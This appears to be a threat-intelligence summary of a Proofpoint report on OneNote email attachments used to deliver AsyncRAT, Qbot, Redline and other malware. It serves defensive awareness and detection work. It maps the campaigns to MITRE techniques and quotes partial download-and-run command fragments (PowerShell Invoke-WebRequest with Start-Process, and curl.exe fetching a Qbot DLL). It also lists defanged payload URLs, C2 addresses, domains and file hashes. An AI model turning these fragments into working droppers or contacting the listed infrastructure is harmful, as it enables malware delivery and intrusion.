Proofpoint researchers report a rising trend of malware delivery via OneNote attachments in email campaigns from December 2022 to January 2023, spanning multiple threat actors and broad targets. End users must interact with embedded OneNote content to execute payloads such as AsyncRAT, Redline, Qbot, and DOUBLEBACK, with campaigns affecting organizations globally in North America and Europe.
#TA577 #TA579 #OneNote #AsyncRAT #Qbot #Redline #AgentTesla #DOUBLEBACK #XWorm #QuasarRAT #Netwire
#TA577 #TA579 #OneNote #AsyncRAT #Qbot #Redline #AgentTesla #DOUBLEBACK #XWorm #QuasarRAT #Netwire
Keypoints
- The use of OneNote (.one) documents to deliver malware via email is increasing.
- Multiple cybercriminal threat actors are using OneNote documents to deliver malware.
- Campaigns range from targeted to broad, with thousands of messages across industries.
- Payloads include AsyncRAT, Redline, AgentTesla, QUASAR RAT, XWorm, Netwire, DOUBLEBACK, and Qbot; TA577 delivered Qbot end of January 2023.
- End users must interact with embedded content (e.g., double-click) to detonate the payload.
- Microsoft macro-blocking in 2022 led actors to diversify attachment types and techniques, often evading some AV detections.
MITRE Techniques
- [T1566.001] Phishing: Attachment – Attackers deliver malware via OneNote document attachments in email with themes like invoices, remittance, and shipping. “The OneNote documents contain embedded files, often hidden behind a graphic that looks like a button. When the user double clicks the embedded file, they will be prompted with a warning.”
- [T1204.002] User Execution – End users must interact with the embedded OneNote content (double-click) to start execution. “If the user double clicked the file… the file will execute.”
- [T1059.001] PowerShell – Used to download and execute payloads (e.g., Invoke-WebRequest to fetch a binary and Start-Process to run it). “oShell.Run ‘cmd /c powershell Invoke-WebRequest -Uri …; PowerShell Start-Process -Filepath …’ “
- [T1105] Ingress Tool Transfer – The malware downloads payloads from remote URLs via PowerShell. “Invoke-WebRequest -Uri … -OutFile …”
- [T1059.007] HTA – HTA-based delivery to download and execute payloads (e.g., Qbot DLL). “HTA uses ‘curl.exe’ to download the Qbot DLL, and run it with the function, ‘Wind’.”
- [T1023] Shortcut Modification – Use of LNK files as payloads embedded in OneNote attachments. “shortcut (LNK) files” mentioned as possible payloads.
- [T1059.005] VBScript – Embedded VBScript in downloaded content to execute payloads (e.g., JnNNj3.vbs). “The VBS would be fully executed.”
Indicators of Compromise
- [URL] – AsyncRAT/other payload delivery URLs – hxxps[:]files.catbox[.]moe/rltrtq.bat, hxxps[:]3.101.39[.]145/Excel.exe, hxxps[:]www.onenotegem[.]com/uploads/soft/one-templates/four-quadrant.one (and 2 more URLs)
- [IP] – AsyncRAT C2 addresses – 209.126.83[.]213, 154.12.234[.]207, 212.193.30[.]230:3345 (and other listed C2s)
- [SHA256] – OneNote Attachment hashes – e5a33b42b71f8ac1a5371888d11a0066b49a7f0c25fe74857fa07fb0c9bdff27, 75819879049e80de6376f146430e63a53fc4291d21f3db930ea872b82d07c77a (and 2 more hashes)
- [Domain] – Malicious payload hosting / domains – direct-trojan[.]com, onenotegem[.]com, www.onenotegem[.]com
- [File name] – Embedded/attached files used to deliver payloads – attachment.hta, four-quadrant.one, Invoice.one, Weekly_assignments.one (and 2 more file names)